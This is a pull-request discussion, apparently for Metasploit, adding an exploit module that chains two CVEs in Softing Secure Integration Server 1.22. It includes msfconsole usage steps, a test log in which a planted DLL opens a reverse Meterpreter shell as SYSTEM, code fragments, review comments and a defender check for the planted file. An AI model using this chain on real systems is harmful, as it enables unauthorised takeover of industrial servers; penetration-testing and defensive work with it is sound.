Add CVE-2022-1373 and CVE-2022-2334 exploit chain #19084

Open
wants to merge 6 commits into base: master

Conversation


@ide0x90 ide0x90 commented Apr 13, 2024

This PR adds a module and related materials for the CVE-2022-1373 and CVE-2022-2334 exploit chain against Softing Secure Integration Server 1.22 that was used during Pwn2Own 2022 Miami. This is dependent on #19075.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do: use exploit/windows/http/softing_sis_rce
  3. Do: set RHOSTS <target_ip>
  4. Do: Optional: set SSL true if necessary
  5. Do: Optional: set RPORT <target_port> if SSL is set
  6. Do: set USERNAME <username> if necessary. Default is admin
  7. Do: set PASSWORD <password> if necessary. Default is admin
  8. Do: Optional: set SIGNATURE <signature> to use signature authentication. PASSWORD will be ignored if SIGNATURE is set!
  9. Do: Optional: set DLLPATH <path_to_custom_dll> to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
  10. Do: exploit and get a shell
  11. Do: Recommended: delete C:\Windows\System32\wbem\wbemcomn.dll

Vulnerable Software

Softing Secure Integration Server 1.22

This version is no longer available for download on the vendor's page, but I have a copy of the installer that I can provide.

Test Environment

Windows Server 2019 Standard x64.

Test run

msf6 > use exploit/windows/http/softing_sis_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
RHOSTS => 192.168.50.119
msf6 exploit(windows/http/softing_sis_rce) > exploit

[*] Started reverse TCP handler on 192.168.50.254:4444
[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
[+] 192.168.50.119:8099 - Valid credentials provided
[*] Generating payload DLL...
[*] Created /home/kali/.msf4/local/wbemcomn.dll
[*] Saving configuration...
[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
[*] Sending stage (201798 bytes) to 192.168.50.119
[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
[*] Meterpreter session 1 opened (192.168.50.254:4444 -> 192.168.50.119:50525) at 2024-04-11 19:52:35 +0800
[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

TODO

  • Figure out why cleanup doesn't work. Manually deleting the planted DLL works, deleting it from within the opened session works, but deleting it with session.fs.file.rm doesn't.
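As an added defender-side check, not part of this PR or the module's code: this PowerShell snippet looks for a wbemcomn.dll at the System32\wbem path the module plants (the path named in step 11 and in the TODO above) and reports its signature status and hash, assuming it runs elevated on the host being examined.

```powershell
# Added example (not from the PR): report on a wbemcomn.dll sitting in System32\wbem,
# the location this module writes its payload DLL to. Assumes an elevated shell.
$planted = Join-Path $env:SystemRoot 'System32\wbem\wbemcomn.dll'

if (-not (Test-Path -LiteralPath $planted)) {
    Write-Output "No wbemcomn.dll present in System32\wbem"
    return
}

$file = Get-Item -LiteralPath $planted
$sig  = Get-AuthenticodeSignature -FilePath $planted
$hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $planted).Hash

# Summarise what was found so it can be compared against a known-good baseline.
[pscustomobject]@{
    Path       = $planted
    SizeBytes  = $file.Length
    CreatedUtc = $file.CreationTimeUtc
    Signature  = $sig.Status
    Signer     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
    SHA256     = $hash
}

# A DLL at this path that carries no valid Authenticode signature matches what the
# module leaves behind when its cleanup fails (see the test run above).
if ($sig.Status -ne 'Valid') {
    Write-Warning "wbemcomn.dll in System32\wbem is not validly signed; treat as planted and investigate"
}
```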

'WfsDelay' => 300
},
'Platform' => 'win',
# the software itself only supports x64, see
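Review bot: the comment on the last line ends at "see" without the reference it points to; either add the link that explains the x64-only support or drop the trailing "see".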
Contributor

If the software only supports x64, is there a reason why we also provide an x86 DLL since this is a DLL hijack attack?

Contributor Author

No, I suppose there's no reason to have a x86 DLL - removed in afd4b8a


def exploit
# in this case, if it appears vulnerable, it should be enough to continue the exploit
unless [CheckCode::Appears].include? check
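Review bot: `[CheckCode::Appears].include? check` on the last line builds a one-element array only to compare against it; `unless check == CheckCode::Appears` states the intent directly, and once `Msf::Exploit::Remote::AutoCheck` is prepended this explicit `check` call is not needed at all.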
Contributor

We wouldn't have to call this if we add auto-check 👍

Contributor Author

Added in afd4b8a

else
# have MSF create the malicious DLL
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')
arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
Contributor

Since the target is always x64, we can only select the x64 DLL. I think we can remove these lines, and define the target DLL as template_x64_windows.dll

Contributor Author

Yep, changed in afd4b8a

end

# clean up the planted DLL if the session is meterpreter
def on_new_session(session)
Contributor

We need to call super in this method

Contributor Author

Added in afd4b8a

end

# load stdapi
session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')
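Review bot: `if !session.ext.aliases.include?('stdapi')` on the last line is more idiomatic as `unless session.ext.aliases.include?('stdapi')`; and since the test run above shows the delete failing with "Access is denied", whatever cleanup path replaces this should keep surfacing that failure to the operator as the final warning in that run does.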
Contributor

The file cleanup functionality can be pulled in with the FileDropper mixin 👍

Contributor Author

I've tried something in 8d6a206 - let me know if that looks OK!

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient

Contributor

Suggested change
prepend Msf::Exploit::Remote::AutoCheck

Contributor Author

Good stuff! Added in afd4b8a

Contributor

If we remove these payload files, we could potentially get an Administrator session from the Framework payload and one of the getsystem techniques would work to elevate to NT AUTHORITY/SYSTEM, leaving us with fewer .c files to maintain. The current approach seems like technique 3: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md#3---token-duplication

Contributor Author

@ide0x90 ide0x90 Apr 19, 2024

I initially wanted to use Metasploit's C compiler like what was done for https://github.com/rapid7/metasploit-framework/blob/397781f2b1a51b9d8766918f9f7e6ab613f4b8b5/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb, or even just generate a "normal" DLL, but both ways of generating DLLs don't work for this exploit - for the Metasploit C compiler method the DLL needs to be compiled with the .def file, for the "normal" DLL created with msfvenom shells don't spawn, and if compiled with the .def file it spawns 18 shells of questionable stability on every exploit attempt.

I figured mutexes and some migration code would be a good idea and all that was already done before in the code for CVE-2017-8464 anyway, so I just reused that code. I'm sure the .c file could be a lot leaner in this case though (we only want to run shellcode and then migrate it to a more stable process).

@bwatters-r7 bwatters-r7 self-assigned this Apr 18, 2024
@bwatters-r7
Contributor

@ide0x90 what's the best way to get the installer from you?


ide0x90 commented Apr 19, 2024

I can share the installer over Google Drive, if that's OK?

@bwatters-r7

Yes, please send the link to msfdev@metasploit.com


ide0x90 commented Apr 22, 2024


Shared the installer

@bwatters-r7

Got it; thanks!

bwatters-r7 commented Apr 22, 2024

Hi there; I've hit a few snags, but I think I have it mostly working; the only catch is that I get an error message when it tries to restore the configuration, reporting Not available in current system state.
Is there something I need to do to finish setting up the target?

msf6 exploit(windows/http/softing_sis_rce) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.111:8099 - Found Softing Secure Integration Server 1.22.0.8686
[*] 16b85d3ea1537a32b0e4e86800fa074d
[+] 10.5.132.111:8099 - Valid credentials provided
[+] The target appears to be vulnerable.
[*] 10.5.132.111:8099 - Saving configuration...
[*] Saved configuration to /home/tmoose/.msf4/local/config_download_1036106ee02065ab4c967afd43893333.zip
[-] 10.5.132.111:8099 - {"Message"=>"Not available in current system state."}
[-] Exploit aborted due to failure: unexpected-reply: 10.5.132.111:8099 - Returned code 400, could not restore configuration!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/softing_sis_rce) > 

ide0x90 commented Apr 24, 2024

Darn, I forgot about that error - it's a tricky one that needs a workaround. I sent more stuff to msfdev@metasploit.com with additional info.
